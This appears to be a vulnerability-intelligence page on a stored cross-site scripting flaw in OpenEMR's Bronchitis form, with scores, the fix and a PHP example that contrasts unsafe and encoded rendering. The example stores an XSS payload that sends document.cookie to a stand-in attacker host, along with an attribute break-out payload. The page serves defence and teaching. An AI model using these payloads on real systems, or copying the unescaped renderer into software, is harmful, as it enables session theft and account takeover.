Cyber Resilience

CVE-2025-30161

Severity: High · Public PoC

Published: 31 March 2025
Modified: 13 May 2025
KEV Added: not listed
Patch: available (fixed in OpenEMR 7.0.3)
CVSS v4.0 base score: 8.4 (High)
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
EPSS score: 0.0688 (91.6th percentile)
Risk Priority: 21 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2025-30161 is a high-severity stored cross-site scripting vulnerability (CWE-80, Basic XSS) in OpenEMR (vendor open-emr, product openemr). Its CVSS v4.0 base score is 8.4 (High).

Operationally, its EPSS score places it in the top 8.4% of CVEs by estimated exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

Deeper analysis

OpenEMR is a free and open source electronic health records and medical practice management application. CVE-2025-30161 is a stored cross-site scripting vulnerability (CWE-80) in the Bronchitis form component that permits an authenticated user with form-editing rights to inject persistent scripts. The flaw resides in the view.php handling of bronchitis form data and carries a CVSS 4.0 score of 8.4.

An attacker able to edit a bronchitis form can store JavaScript that runs in the browser of any administrator who later views the record, allowing theft of that administrator's credentials and subsequent account takeover. The vector's UI:A reflects that a victim must open the affected record; beyond that, no further user interaction and no special network position is required once the payload is persisted.

The vulnerability is fixed in OpenEMR 7.0.3, as stated in the project's GitHub Security Advisory GHSA-59rv-645x-rg6p, whose accompanying code change escapes the previously unsanitized output.
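The rendering flaw described above, shown as an added PHP illustration written for this page: it is neither OpenEMR's view.php nor the fix from the advisory, and the stored row, field names, payload and helper names are constructed assumptions, not the project's schema or API.

```php
<?php
// Added illustration only: not OpenEMR's view.php and not the code change
// from GHSA-59rv-645x-rg6p. It models the vulnerable pattern (a stored
// field echoed raw) beside the hardened pattern (context-aware encoding).
// Row contents, field names and the payload are constructed for the
// example and do not reflect OpenEMR's real form_bronchitis schema.
declare(strict_types=1);

// Constructed stored form row. An account with form-editing rights has
// saved script payloads into two free-text fields.
$row = [
    'id'               => 42,
    'date'             => '2025-03-31',
    'additional_notes' => 'Cough improving. <script>new Image().src="https://attacker.example/?c="+document.cookie</script>',
    'medication'       => '"><img src=x onerror="alert(document.domain)">',
];

// Vulnerable pattern: stored values are interpolated straight into HTML
// body and attribute contexts. Whatever was saved is rendered as markup,
// so the script runs in the session of the administrator viewing it.
function render_unsafe(array $row): string
{
    return '<div class="notes">' . $row['additional_notes'] . '</div>' . "\n"
         . '<input type="text" name="medication" value="' . $row['medication'] . '">' . "\n";
}

// Context-aware encoders (this example's own helpers, named after a
// common text()/attr() convention). Both encode & < > " and ' so a
// stored value cannot close its element or attribute.
function text(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Hardened pattern: every stored value passes through the encoder for
// the context it lands in. The payload is displayed as text, not run.
function render_safe(array $row): string
{
    return '<div class="notes">' . text($row['additional_notes']) . '</div>' . "\n"
         . '<input type="text" name="medication" value="' . attr($row['medication']) . '">' . "\n";
}

// Reviewer check: does the rendered page still contain the raw <script>
// tag or the attribute break-out that came from the stored data?
function contains_live_markup(string $html): bool
{
    foreach (['<script>', '"><img'] as $marker) {
        if (strpos($html, $marker) !== false) {
            return true;
        }
    }
    return false;
}

foreach (['render_unsafe', 'render_safe'] as $renderer) {
    $html = $renderer($row);
    printf("== %s ==\n%s-> live markup from stored data: %s\n\n",
        $renderer, $html, contains_live_markup($html) ? 'YES' : 'no');
}
```

Run with `php example.php`: the unsafe renderer reports live markup from the stored row, the hardened one does not. The point for a fix of this class is to encode at output time, per context (HTML body versus attribute value), rather than to strip tags on save; a stored-XSS fix that only filters new input leaves payloads that were persisted before the patch live in every existing record.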

The EPSS probability rose from a low baseline to a peak of 0.1372 on 2026-05-12 before receding to the current value of 0.0688, indicating that exploitation interest emerged after public disclosure.

Vulnerability details

OpenEMR is a free and open source electronic health records and medical practice management application. A stored XSS vulnerability in the Bronchitis form component of OpenEMR allows anyone who is able to edit a bronchitis form to steal credentials from administrators. This vulnerability is fixed in 7.0.3.

CWE(s)

CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
Related Threats

No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.

Affected Assets

open-emr / openemr
Affected: versions before 7.0.3 (fixed in 7.0.3)

Mitigating Controls

No mitigating controls mapped yet; the per-CVE control annotator has not reached this CVE. The vendor remediation is to upgrade to OpenEMR 7.0.3 or later.

References

GitHub Security Advisory GHSA-59rv-645x-rg6p: https://github.com/openemr/openemr/security/advisories/GHSA-59rv-645x-rg6p